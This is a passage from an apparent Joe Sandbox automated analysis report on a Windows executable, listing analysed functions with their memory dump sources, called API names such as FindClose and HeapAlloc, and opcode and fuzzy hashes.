                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                  • Opcode ID: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
                                                                                                                                                                  • Instruction ID: 117444f90410ab0b62f572c0bcadedc56f16b257d6b92e3ea9883a50112b239a
                                                                                                                                                                  • Opcode Fuzzy Hash: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
                                                                                                                                                                  • Instruction Fuzzy Hash: 331181A1A14685C1EB04FB25C85837DA351EB65FD8FC08031DA8D0A68EDF6ED9C4DB94
                                                                                                                                                                  Function 00007FF72C9F8635 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                  • Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                  • Instruction ID: bcf03b9b9ffcac7bd71f3b9a523080a3d3e07c37603953d375a92ed3605152e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                  • Instruction Fuzzy Hash: 84219F32A14B018AEBA4AF64C8802EC73B8EB5573CFA40635D6AD06AC5DF38D485CB54
                                                                                                                                                                  Function 00007FF72CA0DA10 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
                                                                                                                                                                  • Instruction ID: f0538c95997396e3c9329b0888997f81f78bf0f30046b3211ca9fcaa91518341
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
                                                                                                                                                                  • Instruction Fuzzy Hash: F921B333A1CA8586E760AF28E841B79B6B0EBA4BA4F944234E65D476D9DF3DD4008F10
                                                                                                                                                                  Function 00007FF72CA0D94C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                  • Instruction ID: b148e52417fd535af324851b340ff16f3ed8a9a94a3074b5127d6b9d91b10561
                                                                                                                                                                  • Opcode Fuzzy Hash: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                  • Instruction Fuzzy Hash: 56216573A18A8147E761AF68E880779B6B0EBA4BE4F944234E65D476D9DF3DD4008F10
                                                                                                                                                                  Function 00007FF72C9F9DA8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
                                                                                                                                                                  • Instruction ID: 2d3e1112b318e93cdaccaefc4c06f14f349fe9c81ba0fc57f106ea3b59d58890
                                                                                                                                                                  • Opcode Fuzzy Hash: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
                                                                                                                                                                  • Instruction Fuzzy Hash: A2116321A0C64185FA61BF11AC006B9E2A8EFA5BE4F954431EB8C57A96DF7CD840CF30
                                                                                                                                                                  Function 00007FF72C9D8610 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                  • Opcode ID: e6349361f6599f48b43bc6f5e26d83757976fd9c1f62d7a7d6d28429aee037a6
                                                                                                                                                                  • Instruction ID: 59f6e56f0c6beac68857295b4540375acc78760149fa61928817811d8cfb6184
                                                                                                                                                                  • Opcode Fuzzy Hash: e6349361f6599f48b43bc6f5e26d83757976fd9c1f62d7a7d6d28429aee037a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 28110221B08A4142EB04BF11E51836EA361EF24FA4FD44431D78D0BA8ACF7DE4A08790
                                                                                                                                                                  Function 00007FF72C9F9CEC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
                                                                                                                                                                  • Instruction ID: 2ad25c0aaf68e4a4b000ef28cca8cf521b943e9919a2a5949403b1f7da71b567
                                                                                                                                                                  • Opcode Fuzzy Hash: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
                                                                                                                                                                  • Instruction Fuzzy Hash: A9117F2290C64145FA51BB20AC003B9E2A4EFA5BE8FA54531EB8C07696DE6CD840CB70
                                                                                                                                                                  Function 00007FF72C9FC540 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                  • Instruction ID: 5e783c8425bf00404efc8280ebd5aa4f8b54b0054be955274c7482c4acd5093a
                                                                                                                                                                  • Opcode Fuzzy Hash: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                  • Instruction Fuzzy Hash: D701A961A08B4140EA15FB525D001B9EA99FB65FF0F888671EE9C17BD5CE3CD001CB10
                                                                                                                                                                  Function 00007FF72C9D87B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9EE3AC: FindClose.KERNEL32(?,?,?,?,00007FF72C9D5182), ref: 00007FF72C9EE3B6
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9D8816
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1011579015-0
                                                                                                                                                                  • Opcode ID: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
                                                                                                                                                                  • Instruction ID: b57bae4739f73abd6fde61be4d8d159ca7eee52a2b1670c57ee3c4a4d47e22d0
                                                                                                                                                                  • Opcode Fuzzy Hash: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
                                                                                                                                                                  • Instruction Fuzzy Hash: 5901F461B2958181EF14FB29C84837CA361EF50F98FD00032CB8C1765ADF2DE8C18754
                                                                                                                                                                  Function 00007FF72C9DC350 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                  • Opcode ID: 4a38643fc9bde780cb08b9dba913868f8f7e5423c6d65e71be7f4fa78a6398bc
                                                                                                                                                                  • Instruction ID: 0ef89af387832ded9a95ed877ce78d1104f2412256bd77c9fb82d878b5171709
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a38643fc9bde780cb08b9dba913868f8f7e5423c6d65e71be7f4fa78a6398bc
                                                                                                                                                                  • Instruction Fuzzy Hash: 53018822B18B4181DA10EF17E840169A360FB98FD4F545432EF4D57B55CE38D452CB40
                                                                                                                                                                  Function 00007FF72C9F9EDC Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
                                                                                                                                                                  • Instruction ID: 40ce2171df413666996a1d028519ac5349879f633ac9fa1be68c7bf1c8092fb7
                                                                                                                                                                  • Opcode Fuzzy Hash: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
                                                                                                                                                                  • Instruction Fuzzy Hash: 5CF08221B0974249FA54BB56ACD16BCA1A4EF287D0FC48034EB8D43742DE2CA864CB20
                                                                                                                                                                  Function 00007FF72C9F9E7C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
                                                                                                                                                                  • Instruction ID: 9f76754576a44950c8b8436fd08560020ef6ad68449867445e5da482c0cbdc72
                                                                                                                                                                  • Opcode Fuzzy Hash: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
                                                                                                                                                                  • Instruction Fuzzy Hash: D3F08221B0974249EA54FB669CC16B8A164EF687E0F948034EA8D03742DE2DA464CB30
                                                                                                                                                                  Function 00007FF72C9FBE50 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: f9f77e95c41b4df8bdfd08f931793a2a7754076da3f363fd411357bfb2997952
                                                                                                                                                                  • Instruction ID: 5e8932334c9fa4b734437b09911582f823363fc44ba19436a4d2efe59fb89943
                                                                                                                                                                  • Opcode Fuzzy Hash: f9f77e95c41b4df8bdfd08f931793a2a7754076da3f363fd411357bfb2997952
                                                                                                                                                                  • Instruction Fuzzy Hash: EDE0E531A1864241FA647F74998017CA165DF207F0FA44330E7BC022C1DF2894504920
                                                                                                                                                                  Function 00007FF72C9EE3AC Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                  • Opcode ID: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
                                                                                                                                                                  • Instruction ID: ac92f3f4ebaeb96488531d4fdd731a9595c837933914853565f8d3a27a162e0a
                                                                                                                                                                  • Opcode Fuzzy Hash: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC08C20E0D8C392FA2873711C86670A1A4DF303B0FD02B31D23D00AD1AD1CB1564D32
                                                                                                                                                                  Function 00007FF72C9EE38C Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2029273394-0
                                                                                                                                                                  • Opcode ID: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
                                                                                                                                                                  • Instruction ID: 76fdae8b4bb60c8382f6a34bcc3f2b111c07112f7e1a8493db2ea7deff9a73e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
                                                                                                                                                                  • Instruction Fuzzy Hash: B3C04C24F1D592C3F65437636C43925A1A4EB64761FC04431C50D90654DD5C91D64F66
                                                                                                                                                                  Function 00007FF72CA0A168 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF72C9F47BB,?,?,?,?,?,?,?,?,?,00007FF72C9EEED5), ref: 00007FF72CA0A1A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
                                                                                                                                                                  • Instruction ID: f489c31bfee8f6ee80616f631a5f866b14ad5b841e5cde45145bc3a8fac21579
                                                                                                                                                                  • Opcode Fuzzy Hash: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 69F05811E5D20641FE6476727D41BB591B0DF68BF0F884630DC2F8A2C2DE6CE8808E70

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00007FF72C9FF004 Relevance: 50.9, APIs: 25, Strings: 3, Instructions: 1888COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: $ $*L\(&.
                                                                                                                                                                  • API String ID: 2880407647-586644833
                                                                                                                                                                  • Opcode ID: 9c06f1f85bf3d5005be47dc3ff6a42340ad58a78e291ba71189e4169d13e8b92
                                                                                                                                                                  • Instruction ID: fd2dd885913b11a39756842d4770eebfa36900c34ab77a9bc67c44a7dd6cbea2
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c06f1f85bf3d5005be47dc3ff6a42340ad58a78e291ba71189e4169d13e8b92
                                                                                                                                                                  • Instruction Fuzzy Hash: 3003E572A142C28FE7359E24ED40BEEB6E5FB64398F805135DA4A57B44DB39EA00CF50
